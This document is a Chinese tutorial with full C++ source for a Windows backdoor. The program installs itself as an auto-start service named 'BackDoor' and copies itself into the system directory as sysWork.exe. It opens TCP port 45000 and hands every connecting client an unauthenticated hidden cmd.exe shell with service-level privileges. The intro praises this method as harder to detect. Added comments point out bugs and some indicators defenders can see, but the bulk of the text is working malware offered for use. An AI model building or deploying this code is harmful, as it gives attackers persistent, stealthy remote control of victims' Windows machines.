简介

Windows NT系统后门要实现自启动,有许多种方法,例如注册表自启动、映像劫持技术、SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发现。

C++代码样例

//////////////////////////////////////////////////////////////
//
// FileName : ServiceAutoRunDemo.cpp
// Creator : PeterZ1997
// Date : 2018-5-4 23:19
// Comment : Create Service to make the BackDoor Run Automatically
//
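//////////////////////////////////////////////////////////////
#include <iostream>
#include <WinSock2.h>
#include <winsock.h>
#include <windows.h>
#include <Winsvc.h>
#include <cstdio>
#include <cstring>
#pragma comment(lib, "ws2_32.lib")
using namespace std;

/// Return codes of InstallService()/RemoveService(). main() only tests for
/// SERVICE_OP_ERROR, so SERVICE_ALREADY_RUN is reported there as a success.
#define SERVICE_OP_ERROR -1
#define SERVICE_ALREADY_RUN -2

const unsigned int MAX_COUNT = 255;  /// String Max Length (size of every CHAR path/message buffer below)
const DWORD PORT = 45000;            /// Listen Port — RunService() binds it on INADDR_ANY (all interfaces), no authentication
const unsigned int LINK_COUNT = 30;  /// Max Link Number — listen() backlog and accept() count; must not exceed the 30-element arrays in RunService()

/// Status block reported to the SCM through SetServiceStatus(); written by ServiceMain() and ServiceControl().
SERVICE_STATUS g_ServiceStatus;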
SERVICE_STATUS_HANDLE g_hServiceStatus; /**
 * @brief Service control handler registered by ServiceMain() through RegisterServiceCtrlHandler().
 *        It only rewrites the global g_ServiceStatus and reports it with SetServiceStatus();
 *        nothing else is torn down here. The handler never signals the RunService() listener
 *        thread or the cmd.exe children spawned by StartShell(), so SERVICE_CONTROL_STOP only
 *        changes what the SCM is told, not what is actually running.
 * @param dwCode Service Control Code (a SERVICE_CONTROL_* value delivered by the SCM)
 */
void WINAPI ServiceControl(DWORD dwCode)
{
    switch (dwCode)
    {
    // Service pause: only the reported state changes; nothing here pauses the listener thread.
    case SERVICE_CONTROL_PAUSE:
        g_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
        break;
    // Service continue
    case SERVICE_CONTROL_CONTINUE:
        g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
        break;
    // Service stop: reported state and exit code are reset; no socket, thread or process is released.
    case SERVICE_CONTROL_STOP:
        g_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        g_ServiceStatus.dwWin32ExitCode = 0;
        g_ServiceStatus.dwCheckPoint = 0;
        g_ServiceStatus.dwWaitHint = 0;
        break;
    case SERVICE_CONTROL_INTERROGATE:
        // Interrogate: the current status is re-reported unchanged below.
        break;
    default:
        break;
    }
    // Report the (possibly updated) status back to the SCM. A service normally has no console,
    // so the printf() on failure is effectively discarded — this is not a log.
    if (SetServiceStatus(g_hServiceStatus, &g_ServiceStatus) == 0)
    {
        printf("Set Service Status Error\n");
    }
    return;
} /**
 * @brief Start Remote Shell — thread entry run once per accepted connection by RunService().
 *        Launches "<system directory>\cmd.exe" with a hidden window and with stdin/stdout/stderr
 *        all redirected to the connected socket, then blocks until that cmd.exe exits.
 *        No authentication happens before this point: whoever connected gets the shell, in the
 *        security context of the service process (InstallService() passes a NULL account name
 *        to CreateService(), which Windows treats as LocalSystem by default).
 * @param lpParam the client SOCKET from RunService(), passed through LPVOID and used as a HANDLE
 * @return always 0 (thread exit code)
 */
DWORD WINAPI StartShell(LPVOID lpParam)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    CHAR cmdline[MAX_COUNT] = { 0 };
    GetStartupInfo(&si);
    si.cb = sizeof(STARTUPINFO);
    // The socket doubles as all three standard handles of the child; it reaches the child
    // through the bInheritHandles = TRUE argument of CreateProcess() below.
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)lpParam;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    // Command line is "<GetSystemDirectory()>\cmd.exe"; the GetSystemDirectory() result
    // (including possible truncation) is not checked.
    GetSystemDirectory(cmdline, sizeof(cmdline));
    strcat_s(cmdline, sizeof(cmdline), "\\cmd.exe");
    // Retries forever at 100 ms intervals when CreateProcess() fails — there is no give-up path.
    // dwCreationFlags is passed as NULL (0); cmdline is the mutable command-line buffer.
    while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))
    {
        Sleep(100);
    }
    // Hold this thread until the shell exits, then release the process/thread handles.
    // The socket itself is never closed in this function.
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
} /**
 * @brief Service Running Function — body of the worker thread created by ServiceMain().
 *        Opens a TCP listener on PORT bound to INADDR_ANY (every interface), accepts up to
 *        LINK_COUNT connections, and hands each one to a StartShell() thread right after
 *        sending a fixed banner. Once LINK_COUNT connections have been accepted the loop ends
 *        and the thread only waits for the shells to finish; no further connections are served.
 *        Detection notes for defenders: a service process listening on 45000/tcp and the
 *        plaintext banner "Welcome to Back Door" are both network-observable indicators.
 * @param lpParam NULL (unused)
 * @return always 0
 */
DWORD WINAPI RunService(LPVOID lpParam)
{
    // Banner sent to every client immediately after accept(); fixed and unencrypted.
    CHAR wMessage[MAX_COUNT] = "<================= Welcome to Back Door >_< ==================>\n";
    // NOTE(review): these arrays use the literal 30 while the loop below uses LINK_COUNT;
    // the two agree today, but raising LINK_COUNT alone would overrun them.
    SOCKET sClient[30];
    DWORD dwThreadId[30];
    HANDLE hThread[30];
    WSADATA wsd;
    if (WSAStartup(0x0202, &wsd))
    {
        printf("WSAStartup Process Error\n");
        return 0;
    }
    // WSASocket()'s result is not checked for INVALID_SOCKET.
    SOCKET sListen = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    // sin is not zero-initialised (sin_zero is left as-is).
    sockaddr_in sin;
    sin.sin_family = AF_INET;
    sin.sin_port = htons(PORT);
    sin.sin_addr.S_un.S_addr = INADDR_ANY;
    // The early returns below leave sListen open and skip WSACleanup().
    if (bind(sListen, (LPSOCKADDR)&sin, sizeof(sin))) return 0;
    if (listen(sListen, LINK_COUNT)) return 0;
    for (int i = 0; i < LINK_COUNT; i++)
    {
        // accept() result is not checked before being handed to a thread and to send().
        sClient[i] = accept(sListen, NULL, NULL);
        // One shell thread per client; the SOCKET travels as the thread parameter.
        hThread[i] = CreateThread(NULL, 0, StartShell, (LPVOID)sClient[i], 0, &dwThreadId[i]);
        send(sClient[i], wMessage, strlen(wMessage), 0);
    }
    // Block until every shell thread has exited; the listening socket stays open meanwhile.
    WaitForMultipleObjects(LINK_COUNT, hThread, TRUE, INFINITE);
    return 0;
} /**
 * @brief the Main Function of the Service — entry point handed to the SCM through the
 *        SERVICE_TABLE_ENTRY in main(). Fills in g_ServiceStatus, registers ServiceControl()
 *        as the handler for service name "BackDoor", reports RUNNING, and starts RunService()
 *        on a worker thread. That thread handle is neither stored nor closed here.
 * @param dwArgc number of service arguments (unused)
 * @param lpArgv service arguments (unused)
 */
void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpArgv)
{
    HANDLE hThread;
    g_ServiceStatus.dwCheckPoint = 0;
    g_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_STOP;
    g_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    g_ServiceStatus.dwServiceSpecificExitCode = 0;
    // NOTE(review): reported as SERVICE_WIN32 here, whereas InstallService() registers the
    // service as SERVICE_WIN32_OWN_PROCESS — the two values are inconsistent.
    g_ServiceStatus.dwServiceType = SERVICE_WIN32;
    g_ServiceStatus.dwWaitHint = 0;
    g_ServiceStatus.dwWin32ExitCode = 0;
    // The name must match the one used by CreateService() and the SERVICE_TABLE_ENTRY ("BackDoor").
    g_hServiceStatus = RegisterServiceCtrlHandler("BackDoor", ServiceControl);
    if (!g_hServiceStatus)
    {
        printf("Register Service Error\n");
        return;
    }
    // Goes straight from START_PENDING to RUNNING before the listener thread exists.
    g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    g_ServiceStatus.dwCheckPoint = 0;
    g_ServiceStatus.dwWaitHint = 0;
    if (!SetServiceStatus(g_hServiceStatus, &g_ServiceStatus))
    {
        printf("Set ServiceStatus Error !\n");
        return;
    }
    // All real work happens on this thread; ServiceMain returns right after creating it.
    hThread = CreateThread(NULL, 0, RunService, NULL, 0, NULL);
    if (!hThread)
    {
        printf("Create Thread Error\n");
    }
    return;
} /**
 * @brief Install Service — copies the running executable to "<system directory>\sysWork.exe",
 *        registers that copy with the SCM as auto-start service "BackDoor" (display name
 *        "BackDoor", own process, SERVICE_ERROR_IGNORE, default account because the account
 *        arguments are NULL), starts it and polls until it reports RUNNING.
 *        Artifacts this leaves for a defender: the new file in the system directory, the new
 *        service entry (service installation is logged by the SCM, e.g. System log event 7045)
 *        and the listener opened by RunService() once the service is up.
 * @return 0 on success, SERVICE_OP_ERROR on any SCM failure, SERVICE_ALREADY_RUN when the
 *         service was already running. Needs SC_MANAGER_ALL_ACCESS on the SCM, which in
 *         practice means an administrative token; otherwise OpenSCManager() fails.
 */
int APIENTRY InstallService()
{
    DWORD dwErrorCode;
    SC_HANDLE hscManager;
    SC_HANDLE hServiceHandle;
    SERVICE_STATUS ssServiceStatus;
    CHAR szSystemPath[MAX_COUNT] = "\0";
    CHAR szFileSelfPath[MAX_COUNT] = "\0";
    // Return values of both path lookups are not checked.
    GetSystemDirectory(szSystemPath, sizeof(szSystemPath));
    GetModuleFileName(NULL, szFileSelfPath, sizeof(szFileSelfPath));
    // Two-argument strcat_s: the MSVC array-template overload that infers the buffer size.
    strcat_s(szSystemPath, "\\sysWork.exe");
    // bFailIfExists = true and the result is ignored: if sysWork.exe already exists (or the copy
    // fails for any reason) the service below is still registered pointing at whatever is there.
    CopyFile(szFileSelfPath, szSystemPath, true);
    hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (!hscManager)
    {
        printf("Can not Open the Service Manager\n");
        return SERVICE_OP_ERROR;
    }
    printf("Service Manager Opened Success\n");
    hServiceHandle = CreateService(hscManager, "BackDoor", "BackDoor", SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, szSystemPath, NULL, NULL, NULL, NULL, NULL);
    if (!hServiceHandle)
    {
        dwErrorCode = GetLastError();
        // Only ERROR_SERVICE_EXISTS is handled; any other CreateService() failure falls through
        // with hServiceHandle == NULL into StartService() below.
        if (dwErrorCode == ERROR_SERVICE_EXISTS)
        {
            hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);
            if (!hServiceHandle)
            {
                printf("Can not Create/Open Service\n");
                // hServiceHandle is NULL here; hscManager is not closed on this path.
                CloseServiceHandle(hServiceHandle);
                return SERVICE_OP_ERROR;
            }
            else
            {
                printf("Service Opened Success\n");
            }
        }
    }
    else {
        printf("Service Create Success\n");
    }
    if (!StartService(hServiceHandle, 0, NULL))
    {
        dwErrorCode = GetLastError();
        if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)
        {
            printf("SERVEICE IS ALREADY RUNNING\n");
            CloseServiceHandle(hServiceHandle);
            CloseServiceHandle(hscManager);
            return SERVICE_ALREADY_RUN;
        }
        else
        {
            printf("SERVEICE START ERROR\n");
            CloseServiceHandle(hServiceHandle);
            CloseServiceHandle(hscManager);
            return SERVICE_OP_ERROR;
        }
    }
    // Poll every 100 ms while START_PENDING; any state other than RUNNING is treated as failure.
    while (QueryServiceStatus(hServiceHandle, &ssServiceStatus))
    {
        if (ssServiceStatus.dwCurrentState == SERVICE_START_PENDING)
        {
            Sleep(100);
            continue;
        }
        if (ssServiceStatus.dwCurrentState != SERVICE_RUNNING)
        {
            printf("Service Start Process ERROR\n");
            CloseServiceHandle(hServiceHandle);
            CloseServiceHandle(hscManager);
            return SERVICE_OP_ERROR;
        }
        else
        {
            break;
        }
    }
    // Second query after the loop; it only catches a QueryServiceStatus() failure that ended
    // the loop above, and its dwCurrentState is not examined.
    if (!QueryServiceStatus(hServiceHandle, &ssServiceStatus))
    {
        printf("Service Status Get Error\n");
        CloseServiceHandle(hServiceHandle);
        CloseServiceHandle(hscManager);
        return SERVICE_OP_ERROR;
    }
    printf("Service Start Success\n");
    CloseServiceHandle(hServiceHandle);
    CloseServiceHandle(hscManager);
    return 0;
} /**
 * @brief Remove Service — opens the SCM and the "BackDoor" service, sends it a stop request if
 *        it is RUNNING (the ControlService() result is ignored and the stop is not awaited),
 *        then marks the service for deletion with DeleteService().
 *        The copied sysWork.exe is not deleted here, and neither this function nor
 *        ServiceControl() closes the listener or the cmd.exe children, so the on-disk artifact
 *        outlives "--remove".
 * @return 0 on success, SERVICE_OP_ERROR on any SCM failure
 */
int RemoveService()
{
    SC_HANDLE hscManager;
    SC_HANDLE hServiceHandle;
    SERVICE_STATUS ssServiceStatus;
    hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (!hscManager)
    {
        printf("Open Service Manager Error\n");
        return SERVICE_OP_ERROR;
    }
    printf("Open Service Manager Success\n");
    hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);
    if (!hServiceHandle)
    {
        printf("Open Service Error\n");
        // hscManager is not closed on this path.
        return SERVICE_OP_ERROR;
    }
    printf("Open Service Success\n");
    if (QueryServiceStatus(hServiceHandle, &ssServiceStatus))
    {
        if (ssServiceStatus.dwCurrentState == SERVICE_RUNNING)
        {
            // Fire-and-forget stop; see ServiceControl() for what the STOP actually does.
            ControlService(hServiceHandle, SERVICE_CONTROL_STOP, &ssServiceStatus);
        }
    }
    else
    {
        printf("Service Status Get Error\n");
        CloseServiceHandle(hServiceHandle);
        CloseServiceHandle(hscManager);
        return SERVICE_OP_ERROR;
    }
    // DeleteService() only marks the entry for deletion; the file on disk is untouched.
    if (!DeleteService(hServiceHandle))
    {
        printf("Delete Service Error\n");
        CloseServiceHandle(hServiceHandle);
        CloseServiceHandle(hscManager);
        return SERVICE_OP_ERROR;
    }
    printf("Remove Service Success\n");
    CloseServiceHandle(hServiceHandle);
    CloseServiceHandle(hscManager);
    return 0;
} /**
 * @brief main Function — first hands the service table to StartServiceCtrlDispatcher(). When
 *        the process was started by the SCM this blocks until ServiceMain() returns; when it was
 *        started from a console the dispatcher call fails (its return value is not checked) and
 *        the command-line handling below runs instead. "--install" and "--remove" drive
 *        InstallService()/RemoveService(); anything else prints usage.
 *        Because only SERVICE_OP_ERROR is tested, InstallService()'s SERVICE_ALREADY_RUN
 *        result is printed as "Service Operation Success".
 * @param argc argument count
 * @param argv argument vector
 * @return always 0
 */
int main(int argc, char* argv[])
{
    // Service name here must match RegisterServiceCtrlHandler() in ServiceMain().
    SERVICE_TABLE_ENTRY svTable[] = {
        {(LPSTR)"BackDoor",ServiceMain},
        {NULL,NULL}
    };
    StartServiceCtrlDispatcher(svTable);
    if (argc == 2)
    {
        // stricmp: MSVC CRT case-insensitive compare (non-standard name).
        if (!stricmp(argv[1], "--install"))
        {
            if (InstallService() == SERVICE_OP_ERROR)
            {
                printf("[!]Service Operation Error\n");
            }
            else
            {
                printf("[*]Service Operation Success\n");
            }
        }
        else if (!stricmp(argv[1], "--remove"))
        {
            if (RemoveService() == SERVICE_OP_ERROR)
            {
                printf("[!]Service Operation Error\n");
            }
            else
            {
                printf("[*]Service Operation Success\n");
            }
        }
        else
        {
            printf("[Usage] => *.exe [--install]/[--remove]\n");
        }
    }
    else {
        printf("[Usage] => *.exe [--install]/[--remove]\n");
    }
    return 0;
}
